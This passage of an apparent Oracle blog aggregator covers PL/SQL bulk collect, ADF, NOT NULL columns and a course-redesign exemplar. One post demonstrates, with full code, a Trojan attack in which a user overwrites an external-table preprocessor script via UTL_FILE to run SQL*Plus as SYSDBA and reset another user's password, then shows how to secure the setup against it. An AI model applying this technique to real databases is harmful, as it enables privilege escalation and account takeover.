 16      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 17      dbms_output.put_line(l_str);
 18      EXIT WHEN c_level1%NOTFOUND;
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;
validate backupset 609,610,611,612,613,614;

PL/SQL procedure successfully completed.

But what happens when there are ZERO rows in the table?

ARROW:(MDINH@db01):PRIMARY> delete from t;

6 rows deleted.

ARROW:(MDINH@db01):PRIMARY> 
ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 17      dbms_output.put_line(l_str);
 18      EXIT WHEN c_level1%NOTFOUND;
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;
validate backupset ;

PL/SQL procedure successfully completed.

ARROW:(MDINH@db01):PRIMARY>

Error! I was doing something fundamentally wrong.

Finally, I figured it out: exit when COUNT = 0 instead of checking %NOTFOUND.

ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      EXIT WHEN l_level1.COUNT=0;
 17      l_str := 'validate backupsets '||RTRIM(l_str,',')||';';
 18      dbms_output.put_line(l_str);
 19    END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;
validate backupset 609,610,611,612,613,614;

PL/SQL procedure successfully completed.

ARROW:(MDINH@db01):PRIMARY> delete from t;

6 rows deleted.

ARROW:(MDINH@db01):PRIMARY> 
ARROW:(MDINH@db01):PRIMARY> r
  1  DECLARE
  2    CURSOR c_level1 IS
  3      SELECT recid FROM t WHERE incremental_level > 0;
  4    TYPE t_level1 IS
  5      TABLE OF c_level1%ROWTYPE INDEX BY PLS_INTEGER;
  6    l_level1 t_level1;
  7    l_str VARCHAR2(1000);
  8  BEGIN
  9    OPEN c_level1;
 10    LOOP
 11      FETCH c_level1 BULK COLLECT INTO l_level1 LIMIT 8;
 12      FOR i IN 1..l_level1.COUNT
 13      LOOP
 14        l_str := l_str||l_level1(i).recid||',';
 15      END LOOP;
 16      EXIT WHEN l_level1.COUNT=0;
 17      l_str := 'validate backupset '||RTRIM(l_str,',')||';';
 18      dbms_output.put_line(l_str);
 19      END LOOP;
 20    CLOSE c_level1;
 21  EXCEPTION
 22    WHEN others THEN RAISE;
 23* END;

PL/SQL procedure successfully completed.

I knew the article Best practices for knowing your LIMIT and kicking %NOTFOUND by Steven Feuerstein existed, but was not able to find it at the time.

One more thing to leave you with before I go. Bulk Collect will NEVER raise a NO_DATA_FOUND exception.
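
To see that last point for yourself, here is a minimal sketch along the same lines as the examples above (it assumes the same test table t, emptied as in the last run). A SELECT ... INTO from an empty table would raise NO_DATA_FOUND, but the BULK COLLECT version below completes silently and just leaves the collection empty, which is exactly why checking COUNT is the reliable test.

DECLARE
  -- Collection type matching the single column we fetch
  TYPE t_recid IS TABLE OF t.recid%TYPE INDEX BY PLS_INTEGER;
  l_recids t_recid;
BEGIN
  -- No rows match, yet no NO_DATA_FOUND is raised here;
  -- the collection simply comes back empty.
  SELECT recid BULK COLLECT INTO l_recids
    FROM t
   WHERE incremental_level > 0;

  IF l_recids.COUNT = 0 THEN
    dbms_output.put_line('No backupsets found - and no exception raised.');
  END IF;
END;
/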


From Las Vegas to Ottawa

Pakistan's First Oracle Blog - Sun, 2014-04-13 05:27
After a very engaging session at Collaborate14 in sunny Las Vegas, amidst the Nevada desert, I have just arrived in not-so-bitterly-cold Ottawa, the capital of Canada. I am looking forward to meeting various Pythian colleagues and hanging out with the friends I cherish most.

My Exadata IORM session went well. There has been lots of follow-up discussion, and questions are still pouring in. I promise I will answer them as soon as I return to Australia in a couple of weeks. That reminds me of my flight from one corner of the globe to the other; I still need to learn how to sleep like a baby during flights. Any ideas?

Ottawa reminds me of the Australian capital, Canberra. It's quite a change after neon-lit Vegas. Where Vegas was bathing in lights, simmering with shows, bubbling with bars, swarming with party-goers, and rattling with casinos, Ottawa is laid-back, quiet, peaceful, and small. The restaurants and cafes look cool. The Ottawa River is mostly still frozen, and mounds of snow line the roadsides beneath the leafless trees.

But spring is here, and things look all set to rock.
Categories: DBA Blogs

ADF Query Design Revisited with ADF 12c Panel Drawer

Andrejus Baranovski - Sat, 2014-04-12 12:22
My goal in this post is to take a closer look at ADF 12c and check how the ADF Query layout can be optimised using the Panel Drawer component. The sample application focuses on several items:

1. Panel Drawer component in ADF 12c and its usage for ADF Query

2. Declarative mode support for VO Query optimisation

3. Dynamic bindings in Page Definition for ADF Query

4. View Object query logging

Here you can download the sample application - ADFQueryPreviewApp.zip. This is how the UI looks initially, when the Employees fragment is opened:


You should notice the magnifying glass icon in the top right; this is rendered by the ADF 12c Panel Drawer component. The user can click on this icon and the ADF Query slides in and becomes available; click the same magnifying glass, or anywhere else on the page, and it slides out automatically. This is really convenient, as it saves space on the screen - the ADF Query is rendered on top of the other components, in a drawer:


Obviously, you could have as many panel drawers as you prefer - this is not only for ADF Query. As you can see in the screenshot above, a search is executed. There are only three columns in the results table, so the SQL query is generated with just the key and the attributes for these three columns. This is a feature provided by VO declarative mode:


Move to the second accordion group and search for a different value - this group displays more columns:


The SQL query is different as well - it now includes all visible attributes. Such a search implementation is especially useful in cases where many attributes must be displayed in the result set. It makes sense to display a result set with only a few attributes first and give the user an option to see all the attributes in an additional table. This means the initial SQL query is lighter, and all attributes are fetched later, as in this example:


Let's now check the technical details. The VO is set to run in declarative mode, and all the attributes (except the primary key) are marked with Selected in Query = false. This allows the displayed attributes to be calculated at runtime, based on the ADF bindings, and the SQL query to be constructed accordingly:


There is one hidden gem in the sample application - a generic class that provides detailed logging of executed SQL queries and fetched rows. You could use it in your project immediately, without any change:


The ADF Query is integrated into the Panel Drawer using the regular ADF Faces Show Detail Item component, with a custom magnifying glass image set:


Each accordion item where results are displayed is set with a disclosure listener - this is needed to update the current context and apply the ADF Query to filter results in either the Preview or the Complete accordion item:


Each accordion item is configured with a JSF attribute to identify itself:


The accordion item disclosure listener updates the currently opened item index; this is used in the ADF bindings to dynamically map the ADF Query binding to the proper results iterator:


ADF Query in the ADF bindings is represented by a Search Region. Unfortunately, the Search Region's Binds property doesn't work with a dynamic expression. I resolved this with one trick - I defined a new iterator whose Binds property is calculated dynamically (using the current accordion item index). The Search Region points to this artificial iterator, and the iterator in turn points to the VO instance. Both results tables point to the same VO instance:


You can spot the attribute definitions in the table bindings - VO declarative mode decides which attributes to include in the SQL query based on these attribute bindings.

Oracle External Table Pre-processing – Soccer Super-Powers and Trojan Horses

The Anti-Kyte - Sat, 2014-04-12 08:41

The end of the European Football season is coming into view.
In some leagues the battle for the title, or against relegation is reaching a peak of intensity.
Nails are being bitten throughout the continent…unless you are a fan of one of those teams who are running away with their League – Bayern Munich, Juventus, Celtic…Luton Town.
In their fifth season since relegation from the Football League to the Conference, Luton are sitting pretty in the sole automatic promotion place.
Simon is desperately attempting to balance his "lucky" Christmas-cracker moustache until promotion is mathematically certain. Personally, I think that this is taking the concept of keeping a stiff upper-lip to extremes.

"I'll shave it off when we're definitely up !"

“I’ll shave it off when we’re definitely up !”

With the aid of a recent Conference League Table, I’m going to explore the Preprocessor feature of External Tables.
We’ll start with a simple example of how data in an External Table can be processed via a shell script at runtime before the results are then presented to the database user.
We’ll then demonstrate that there are exceptions to the rule that “Simple is Best” by driving a coach and Trojan Horses through the security hole we’ve just opened up.
Finally, in desperation, we’ll have a read of the manual and implement a more secure version of our application.

So, without further ado…

External (league) Table Preprocessing

We have the league table in a csv called conference_table.csv :

Team, Played, Goal Difference, Points
luton town,32,55,72
cambridge utd,31,25,58
barnet,34,11,57
alfreton town,33,0,57
salisbury city,33,0,53
nuneaton town,34,-4,53
gateshead,34,7,51
kidderminster harriers,32,4,50
grimsby town,29,13,49
halifax town,34,10,48
macclesfield town,31,6,47
welling united,32,6,46
forest green,30,14,44
wrexham,33,0,43
lincoln city,34,-4,43
braintree town,27,9,42
woking,34,-11,42
hereford united,33,-11,39
chester,33,-17,35
southport,33,-20,34
aldershot town,32,5,33
dartford,34,-19,33
tamworth,32,-21,29
hyde,34,-58,9

In order to load this data into an External Table, we’ll need a Directory Object in the database that points to an OS directory where this file is located.
In this case, we have a Directory Object called MY_FILES which has been created thus :

CREATE OR REPLACE DIRECTORY my_files AS
    '/u01/app/oracle/my_files'
/

If we now want to access the data in this file, we simply need to copy it to the OS directory pointed to by our Directory Object, make sure that the ORACLE os user can read the file, and then point an external table at it.
So…

cp conference_table.csv /u01/app/oracle/my_files/.
chmod a+r conference_table.csv

Just to check :


ls -l conference_table.csv

-rw-r--r-- 1 mike   mike     571 Mar 27 13:20 conference_table.csv

As you can see, whilst oracle does not own this file it will have read access to it, as will any other OS user.

And as for our common-or-garden External Table :

CREATE TABLE conference_tab_xt
(
    team varchar2(50),
    played number(2),
    goal_difference number(4),
    points number(3)
)
    ORGANIZATION EXTERNAL
    (
        TYPE oracle_loader
        DEFAULT DIRECTORY my_files
        ACCESS PARAMETERS
        (
            RECORDS DELIMITED BY NEWLINE
            SKIP 1
            FIELDS TERMINATED BY ','
            (
                team char(50),
                played integer external(2),
                goal_difference integer external(4),
                points integer external(2)
            )
        )
            LOCATION('conference_table.csv')
    )
REJECT LIMIT UNLIMITED
/

Using this, we can now see just who is top of the pile in the Conference…

SELECT team
FROM mike.conference_tab_xt
WHERE points = ( SELECT MAX(points) FROM conference_tab_xt)
/

TEAM
--------------------------------------------------
luton town

SQL> 

So far, so good. However, say we wanted to ensure that all of the team names were in upper case when they were loaded into the database ?
OK, this is a fairly trivial requirement, but it does give me the excuse to knock up a simple demonstration of how to implement a Preprocessor for this file.

The shell script to achieve this is relatively simple. If we were just going to run it from the OS, it would look something like this :

#!/bin/sh
cat $1 |tr '[:lower:]' '[:upper:]'

The argument passed into the script is the name of the csv file.
In order to make this script suitable for our purposes however, we’ll need to modify it a bit.
Bear in mind that both the cat and tr commands are executed based on what’s in the $PATH variable of the session in which the script is running.
As we can’t guarantee that this variable will be set at run time when the script is invoked from the database, we need to fully qualify the path to these executables.
If you need to work out the path to these executables, you can simply run the following at the command line :

$ which cat
/bin/cat
$ which tr
/usr/bin/tr

Now we can amend the script to read :

#!/bin/bash
/bin/cat $1|/usr/bin/tr '[:lower:]' '[:upper:]'

I’ve created this file as the oracle os user and saved it into the same directory as the csv file.
What could possibly go wrong ? We’ll come back to that in a bit.

For now, all we need to do is to make the file executable :

chmod u+x toupper.sh
ls -l toupper.sh
-rwxr--r-- 1 oracle dba 58 Apr  7 19:30 toupper.sh

Now, finally, we can re-create our External Table as follows :

DROP TABLE conference_tab_xt
/

CREATE TABLE conference_tab_xt
(
    team varchar2(50),
    played number(2),
    goal_difference number(4),
    points number(3)
)
    ORGANIZATION EXTERNAL
    (
        TYPE oracle_loader
        DEFAULT DIRECTORY my_files
        ACCESS PARAMETERS
        (
            RECORDS DELIMITED BY NEWLINE
            PREPROCESSOR my_files : 'toupper.sh'
            SKIP 1
            FIELDS TERMINATED BY ','
            (
                team char(50),
                played integer external(2),
                goal_difference integer external(4),
                points integer external(2)
            )
        )
            LOCATION('conference_table.csv')
    )
REJECT LIMIT UNLIMITED
/

Seems reasonable. After all, minimizing the number of Directory Objects in the database will also minimize the number of possible entry points for any would-be directory-based attacks, right ? Hmmm.

Anyway, we can now check that the preprocessor does its work by re-issuing our query :

SELECT team
FROM mike.conference_tab_xt
WHERE points = ( SELECT MAX(points) FROM mike.conference_tab_xt)
/

TEAM
--------------------------------------------------
LUTON TOWN

Well, that all seems to work perfectly. But is it secure ?

Footballing rivalry in the database

To demonstrate the sort of problems that you could encounter with this External Table as it’s currently defined, we need to return to the land of the Trojan Horse.

Consider two users who need access to the External table we’ve just created.
We’ll call them Achilles and Hector.
If you really want a back-story, Hector is a keen Olympiakos fan, basking in the glory of their runaway lead at the top of the Greek Super League. Achilles supports Panathinaikos and is a bit fed-up with Hector giving it large about how great his team is. The fact that matches between the two teams are referred to as The Derby of the Eternal Enemies adds an extra frisson of tension around the office.

Both of them have the CREATE SESSION privilege and have been granted the DATA_PROCESS_ROLE, which is created as follows:

CREATE ROLE data_process_role
/

GRANT SELECT ON mike.conference_tab_xt TO data_process_role
/

GRANT READ, WRITE, EXECUTE ON DIRECTORY my_files TO data_process_role
/

GRANT EXECUTE ON UTL_FILE TO data_process_role
/

Just in case you want to play along, the two users have been created like this :

CREATE USER hector identified by pwd
/

GRANT CREATE SESSION, data_process_role TO hector
/

CREATE USER achilles identified by pwd
/

GRANT CREATE SESSION, data_process_role TO achilles
/

A point to note here is that the EXECUTE permission on the Directory Object is required for users to be able to run the preprocessor program.
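
If you want to double-check exactly what has been granted on a given Directory Object, a quick query against DBA_TAB_PRIVS (run as a suitably privileged user - the directory name here is simply the one used in this example) is one way to do it:

SELECT grantee, privilege
FROM dba_tab_privs
WHERE table_name = 'MY_FILES'
ORDER BY grantee, privilege
/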

Achilles has decided to take Hector down a peg or two by creating a bit of mischief. He’s heard about this external table pre-processing and wonders if he might be able to use it to help him in his plan.

Before he sets about building his Wooden Horse, Achilles does some planning…

Planning the attack

First, Achilles finds out about the privileges he currently has :

SELECT privilege
FROM session_privs;

PRIVILEGE                              
----------------------------------------
CREATE SESSION               

SQL> SELECT owner, table_name, privilege
  2  FROM role_tab_privs
  3  ORDER BY table_name;

OWNER		     TABLE_NAME 	  PRIVILEGE
-------------------- -------------------- --------------------
MIKE		     CONFERENCE_TAB_XT	  SELECT
SYS		     MY_FILES		  EXECUTE
SYS		     MY_FILES		  READ
SYS		     MY_FILES		  WRITE
SYS		     UTL_FILE		  EXECUTE

Looks like the CONFERENCE_TAB_XT might be the type of external table he’s looking for.
He checks this in his IDE (SQLDeveloper in this case).
Opening the object and asking for the source SQL gives:

-- Unable to render TABLE DDL for object MIKE.CONFERENCE_TAB_XT with DBMS_METADATA attempting internal generator.
CREATE TABLE MIKE.CONFERENCE_TAB_XT 
(
  TEAM VARCHAR2(50 BYTE) 
, PLAYED NUMBER(2, 0) 
, GOAL_DIFFERENCE NUMBER(4, 0) 
, POINTS NUMBER(3, 0) 
) 
ORGANIZATION EXTERNAL 
( 
  TYPE ORACLE_LOADER 
  DEFAULT DIRECTORY MY_FILES 
  ACCESS PARAMETERS 
  ( 
    RECORDS DELIMITED BY NEWLINE
            PREPROCESSOR MY_FILES : 'toupper.sh'
            SKIP 1
            FIELDS TERMINATED BY ','
            (
                team char(50),
                played integer external(2),
                goal_difference integer external(4),
                points integer external(2)
            ) 
  ) 
  LOCATION 
  ( 
    MY_FILES: 'conference_table.csv' 
  ) 
) 
REJECT LIMIT 0

Now Achilles can see that this is indeed an External Table. The file on which it’s based resides in the MY_FILES directory, hence the READ/WRITE privileges on that directory.
There is also a preprocessor for the table. This also resides in the MY_FILES directory, hence the EXECUTE privilege he’s been granted.

The final step in the planning process is to find out what the toupper.sh script does.
As he’s got READ and WRITE to the Directory, Achilles can do this :

set serveroutput on size unlimited
DECLARE
--
-- Script to read a file from a directory
--
    l_fp UTL_FILE.FILE_TYPE;
    l_buffer VARCHAR2(32767);
BEGIN 
    l_fp := UTL_FILE.FOPEN
    (
        location => 'MY_FILES',
        filename => 'toupper.sh',
        open_mode => 'R'
    );
    --
    -- Now output the contents...
    --
    BEGIN
        LOOP
            UTL_FILE.GET_LINE(l_fp, l_buffer);
            DBMS_OUTPUT.PUT_LINE(l_buffer);
        END LOOP;
    EXCEPTION
        WHEN NO_DATA_FOUND THEN
            NULL;
    END;
END;
/

He saves the code to a file called read_shell_script.sql. When he runs it :

SQL> @read_shell_script.sql
#!/bin/sh
/bin/cat $1|/usr/bin/tr '[:lower:]' '[:upper:]'

PL/SQL procedure successfully completed.

SQL> 
Wheeling the horse to the gates…

Achilles now has all the information required to implement his attack.
At this point, he could do whatever he wanted. Remember, the shell script is executed as the oracle user on the OS, the same oracle user that owns the database.

What he actually decides to do is…

DECLARE
    l_fp UTL_FILE.FILE_TYPE;
    l_buffer VARCHAR2(32767);
BEGIN 
    l_fp := UTL_FILE.FOPEN
    (
        location => 'MY_FILES',
        filename => 'toupper.sh',
        open_mode => 'W'
    );
    --
    -- Now write the new and "improved" script
    --
    UTL_FILE.PUT_LINE(l_fp, '#!/bin/sh');
    UTL_FILE.PUT_LINE(l_fp, '/u01/app/oracle/product/11.2.0/xe/bin/sqlplus -s / as sysdba <<- END_SCRIPT');
    UTL_FILE.PUT_LINE(l_fp, 'set feedback off');
    UTL_FILE.PUT_LINE(l_fp, 'alter user hector identified by Panathinaikos_no1_nuff_said;');
    UTL_FILE.PUT_LINE(l_fp, 'quit;');
    UTL_FILE.PUT_LINE(l_fp, 'END_SCRIPT');
    UTL_FILE.PUT_LINE(l_fp, '/bin/cat $1|/usr/bin/tr [:lower:] [:upper:]');
    UTL_FILE.FFLUSH(l_fp);
    UTL_FILE.FCLOSE(l_fp);
END;
/

This works as expected. After all, as well as Achilles having write access to the MY_FILES directory object in the database, the oracle user on the OS also has write privileges on the toupper.sh file.
Anyway, once this code has run, the shell script now looks like this :

#!/bin/sh
/u01/app/oracle/product/11.2.0/xe/bin/sqlplus -s / as sysdba <<- END_SCRIPT
set feedback off
alter user hector identified by Panathinaikos_no1_nuff_said;
quit;
END_SCRIPT
/bin/cat $1|/usr/bin/tr [:lower:] [:upper:]

Of course, being a Trojan, the program hasn’t done anything yet. Achilles leaves everything as is at the moment.

A short while later, Hector decides to find out how things look at the top of the Conference (he’s a bit of a European Football geek, truth be told):

SELECT team, pld, pts, gd
FROM
(
  SELECT team, played as pld, points as pts, goal_difference as gd,
    RANK() OVER( ORDER BY points DESC, goal_difference DESC) as position
    FROM mike.conference_tab_xt
  )
  WHERE position < 6
/

The query works as expected and Hector is none the wiser. The next time he goes to log in, however, he gets an unpleasant surprise:

$ sqlplus hector

SQL*Plus: Release 11.2.0.2.0 Production on Thu Apr 10 18:48:03 2014

Copyright (c) 1982, 2011, Oracle.  All rights reserved.

Enter password: 
ERROR:
ORA-01017: invalid username/password; logon denied


Enter user-name: 

After a couple of days of the DBA getting annoyed at Hector because he can’t “remember” his password, Achilles simply changes the script back :

DECLARE
--
-- Script to reset toupper.sh to its original contents
--
    l_fp UTL_FILE.FILE_TYPE;
    l_buffer VARCHAR2(32767);
BEGIN 
    l_fp := UTL_FILE.FOPEN
    (
        location => 'MY_FILES',
        filename => 'toupper.sh',
        open_mode => 'W'
    );
    UTL_FILE.PUT_LINE(l_fp, '#!/bin/sh');
    UTL_FILE.PUT_LINE(l_fp, '/bin/cat $1|/usr/bin/tr [:lower:] [:upper:]');
    UTL_FILE.FFLUSH(l_fp);
    UTL_FILE.FCLOSE(l_fp);
END;
/
When all else fails – Read the Manual

Clearly the solution we’ve implemented here has one or two issues.
On reflection, it might have been quite a good idea to look at the documentation on the subject of preprocessor security.

From this, we can see that there are a number of steps we can take to prevent this sort of attack.

Keeping preprocessors separate from data files

As things stand, our database users have full permissions on the MY_FILES directory object.
However, the EXECUTE privilege is only necessary because they need to execute the preprocessor program.
So, if we created a separate directory object just for the preprocessor, that should solve the problem, right?
Well, it depends.
Remember, there is nothing to stop you having multiple directory objects in the database pointing to a single OS directory.
We want to make sure that it is not possible for our users to write to the preprocessor file from within the database.
To do this, we need an additional Directory Object pointing to a different OS directory.

So, the first step then is to create the OS directory and then a Directory Object in the database that points to it :

sudo su oracle
mkdir /u01/app/oracle/pre_proc_dir

…and the new Directory Object :

CREATE DIRECTORY pre_proc_dir AS
    '/u01/app/oracle/pre_proc_dir'
/
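
To satisfy ourselves that the two Directory Objects really do resolve to different locations on the OS, we can check DBA_DIRECTORIES (object names as used in this example):

SELECT directory_name, directory_path
FROM dba_directories
WHERE directory_name IN ('MY_FILES', 'PRE_PROC_DIR')
/
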
File permissions on the OS

Once we’ve done this, we can re-create toupper.sh in our new preprocessor OS directory and remove it from its original location.
Whilst we’re doing this, it’s probably worth bearing in mind that the oracle OS user only needs execute permissions on the file.
There’s nothing to stop it being owned by a different OS user. So, for example, I could create toupper.sh as mike and do the following :

chmod a+x toupper.sh
ls -l toupper.sh
-rwxr-xr-x 1 mike dba 244 Mar 28 14:19 toupper.sh

Now, whilst the oracle user can still execute (and read) the file, it cannot write to it. So, even if a user has write permissions on the PRE_PROC_DIR directory object in the database, they won’t be able to change the file itself.
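
In fact, even if someone were later granted WRITE on the PRE_PROC_DIR Directory Object (nobody has been here), an attempt to open the script for writing should now fall over at the OS level, typically with something like ORA-29283: invalid file operation:

DECLARE
    l_fp UTL_FILE.FILE_TYPE;
BEGIN 
    --
    -- This should fail because the oracle OS user does not have write
    -- permission on toupper.sh itself
    --
    l_fp := UTL_FILE.FOPEN
    (
        location => 'PRE_PROC_DIR',
        filename => 'toupper.sh',
        open_mode => 'W'
    );
    UTL_FILE.FCLOSE(l_fp);
END;
/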

The next step is to re-create our External Table to use the new preprocessor location :

DROP TABLE conference_tab_xt
/

CREATE TABLE conference_tab_xt
(
    team varchar2(50),
    played number(2),
    goal_difference number(4),
    points number(3)
)
    ORGANIZATION EXTERNAL
    (
        TYPE oracle_loader
        DEFAULT DIRECTORY my_files
        ACCESS PARAMETERS
        (
            RECORDS DELIMITED BY NEWLINE
            PREPROCESSOR pre_proc_dir : 'toupper.sh'
            SKIP 1
            FIELDS TERMINATED BY ','
            (
                team char(50),
                played integer external(2),
                goal_difference integer external(4),
                points integer external(2)
            )
        )
            LOCATION('conference_table.csv')
    )
REJECT LIMIT UNLIMITED
/
Directory Object grants

Finally, we need to modify the grants to the DATA_PROCESS_ROLE so that users can still access the table :

REVOKE EXECUTE ON DIRECTORY my_files FROM data_process_role
/
GRANT EXECUTE ON DIRECTORY pre_proc_dir TO data_process_role
/
-- re-grant select on the table as we've re-created it...
GRANT SELECT ON mike.conference_tab_xt TO data_process_role
/

Let’s see how (and indeed, whether) these changes prevent this kind of attack.

Achilles’ privileges have changed :

OWNER                          TABLE_NAME                     PRIVILEGE
------------------------------ ------------------------------ ----------------------------------------
MIKE                           CONFERENCE_TAB_XT              SELECT
SYS                            MY_FILES                       READ
SYS                            MY_FILES                       WRITE
SYS                            PRE_PROC_DIR                   EXECUTE
SYS                            UTL_FILE                       EXECUTE

Now, when he comes to read or write the shell script, it’s located in PRE_PROC_DIR, a directory object to which he only has EXECUTE privileges, so he’ll get:

ORA-29289: directory access denied
ORA-06512: at "SYS.UTL_FILE", line 41
ORA-06512: at "SYS.UTL_FILE", line 478
ORA-06512: at line 10
29289. 00000 -  "directory access denied"
*Cause:    A directory object was specified for which no access is granted.
*Action:   Grant access to the directory object using the command
           GRANT READ ON DIRECTORY [object] TO [username];.
Other points to note

Of course, given a different set of object privileges, it would still be possible for Achilles to cause some mischief by exploiting the External Table preprocessing functionality.
Perhaps the most pertinent privilege here would be CREATE ANY DIRECTORY.
If you have this privilege then you will also have full rights on any Directory that you create. Remember, there is nothing to stop you having multiple Directory Objects that point to a single OS directory.
If Achilles had this privilege, and we had not removed the oracle OS user’s read/write privilege on our preprocessor program, then he could simply have created his own Directory Object in the database and used that to execute the same attack.
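
Purely by way of illustration (the directory name here is invented), that version of the attack could have started with something as simple as:

CREATE DIRECTORY sneaky_dir AS
    '/u01/app/oracle/pre_proc_dir'
/
-- ...and then simply pointing the earlier UTL_FILE code at SNEAKY_DIR instead of MY_FILES.
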
The Oracle documentation also mentions some auditing steps that you might consider. In addition to auditing the DROP ANY DIRECTORY privilege, I’d also suggest auditing CREATE ANY DIRECTORY.
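
If you did decide to switch that auditing on (traditional, pre-unified auditing syntax assumed here), it could be as simple as:

AUDIT CREATE ANY DIRECTORY BY ACCESS
/
AUDIT DROP ANY DIRECTORY BY ACCESS
/
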
I think the other point to note here is that, whilst auditing may serve as a deterrent, it does nothing to actively prevent this kind of thing happening.

As things stand, Luton need only one more win for promotion. Hopefully, Simon’s moustache’s days are strictly numbered.


Filed under: Oracle, PL/SQL, Shell Scripting, SQL Tagged: directory object permissions, external tables, oracle loader, preprocessor, UTL_FILE

adding NOT NULL columns to an existing table ... implications make me grumpy

Grumpy old DBA - Sat, 2014-04-12 07:56
This is DBA basics 101 in the oracle world but, well, also something that we grumpy DBA types forget from time to time.  We have an existing table in a schema that is populated with data.  Something like this, say:


create table dbaperf.has_data ( column_one varchar2(10) not null, column_two number(10) not null);

insert into dbaperf.has_data(column_one, column_two) values('First row',13);
insert into dbaperf.has_data(column_one, column_two) values('Another',42);
commit;

Now you need to add another column that is also NOT NULL.  Chris Date is not happy that vendor implementations of the relational model allow null columns.  Be aware of any potential NULL columns in rows and handle them carefully (IS NULL / IS NOT NULL) to avoid messing up results.

But anyhow we are going to add in a new column that is NOT NULL.

How easy that is to do against an Oracle table depends on whether one is also supplying a DEFAULT value for the new column.  If you do not supply a DEFAULT value, what happens here?

 alter table dbaperf.has_data add ( column_three char(1) NOT NULL );

You get: ORA-01758: table must be empty to add mandatory (NOT NULL) column

To get around that you have to do this in three steps:
  • Add in the new column
  • Populate all the new columns with a value ( data migration )
  • Make the column NOT NULL
alter table dbaperf.has_data add ( column_three char(1) );

update dbaperf.has_data set column_three = 'X' where column_one = 'First row';
update dbaperf.has_data set column_three = 'X' where column_one = 'Another';

alter table dbaperf.has_data modify ( column_three NOT NULL );
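
If you want to satisfy yourself that the column really is mandatory now, a quick (purely illustrative) look at the data dictionary will confirm it:

select column_name, nullable
from dba_tab_columns
where owner = 'DBAPERF'
and table_name = 'HAS_DATA'
order by column_id;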

Things get easier if you do this with a DEFAULT clause on the new column.  The problem, of course, is that some columns have a reasonable default value while others may never get agreement on a default value.  A min or a max type column can probably take an easy default; others, not so much.

alter table dbaperf.has_data add ( column_four number(21,2) default 0 NOT NULL );

All of this discussion sidesteps the implications of adding a new column to a large existing table or partitioned table and fragging up the blocks ... that is a little beyond 101 for now.
Categories: DBA Blogs

AAC&U GEMs: Exemplar Practice

Michael Feldstein - Sat, 2014-04-12 06:04

A while back, I wrote about my early experiences as a member of the Digital Working Group for the AAC&U General Education Maps and Markers (GEMs) initiative and promised that I would do my homework for the group in public. Today I will make good on that promise. The homework is to write up an exemplar practice of how digital tools and practices can help support students in their journeys through GenEd.

As I said in my original post, I think this is an important initiative. I invite all of you to write up your own exemplars, either in the comments thread here or in your own blogs or other digital spaces.

The template for the exemplar is as follows:

Evocative Examples of Digital Resources and Strategies that can Improve General Education: What are these cases a case of?

Brief Description of practice:

  • In what ways is the practice effective or transformative for student learning? What’s the evidence? How do we know? (If you can tie the practice to any of the outcomes in the DQP and/or the LEAP Essential Learning Outcomes, that would be great.)
  • How does the practice reflect the digital world as lived student culture? What are the skills and content associated with the digital practice or environment? How does the practice deepen or shape behavior of students with digital tools and environments with which they may be variously familiar?
  • What does it take to make the practice work? What is the impact on faculty time? Does it take a team to design, implement, assess? What are the implications for organizational change?
  • How is it applicable to gen ed (if example doesn’t come from gen ed)?
  • Are there references or literature to which you can point that is relevant to the practice?

I decided to base my exemplar on the MSU psychology class that I’ve written about recently.

Flipped and Blended Class with Homework Platform Support

In this practice, every effort is made to move both direct instruction and formative assessment outside of class time. The “flipped classroom” (or “flipped learning”) approach is employed, providing students with instructional videos and other supplemental content. In addition, a digital homework platform is used, enabling students to get regular formative assessments. In order to give students more time for these activities, the amount of in-class time is reduced, making the course effectively a blended or hybrid course. In-class time is devoted to class discussion, which is informed by the instructor’s knowledge of the students’ performance on the regular formative assessments, and to group work.

In what ways is the practice effective or transformative for student learning? What’s the evidence? How do we know?

This is a particular subset of a practice that the National Center for Academic Transformation (NCAT) calls “the replacement model”, and they have a variety of course redesign projects that demonstrated improved outcomes relative to the control. For example, a redesign of a psychology Gen Ed course at Missouri State University produced the following results:

  • On the 30-item comprehensive exam, students in the redesigned sections performed significantly better (84% improvement) compared to the traditional comparison group (54% improvement).
  • Students in the redesigned course demonstrated significantly more improvement from pre to post on the 50-item comprehensive exam (62% improvement) compared to the traditional sections (37% improvement).
  • Attendance improved substantially in the redesigned section. (Fall 2011 traditional mean percent attendance = 75% versus fall 2012 redesign mean percent attendance = 83%)
  • Over a three-semester period following the redesign, the course DFW rate improved from 24.6% to 18.4% (most of which was because of a significant drop in the withdrawal rate).

One of the investigators of the project, who also was a course instructor, indicated that the quality of class discussion improved significantly as well.

Possible reasons why the practice is effective include the following:

  • Teacher/student contact time is maximized for interactivity.
  • Regular formative assessments with instant feedback help students to be better prepared to maximize discussion time with the teacher and with peers.
  • Feedback from the homework system enabled the instructor to walk into class knowing where students need the most help.
  • Reduced number of physical class meetings reduces the chances that a student will withdraw due to grade damaging absences.

How does the practice reflect the digital world as lived student culture? What are the skills and content associated with the digital practice or environment? How does the practice deepen or shape behavior of students with digital tools and environments with which they may be variously familiar?

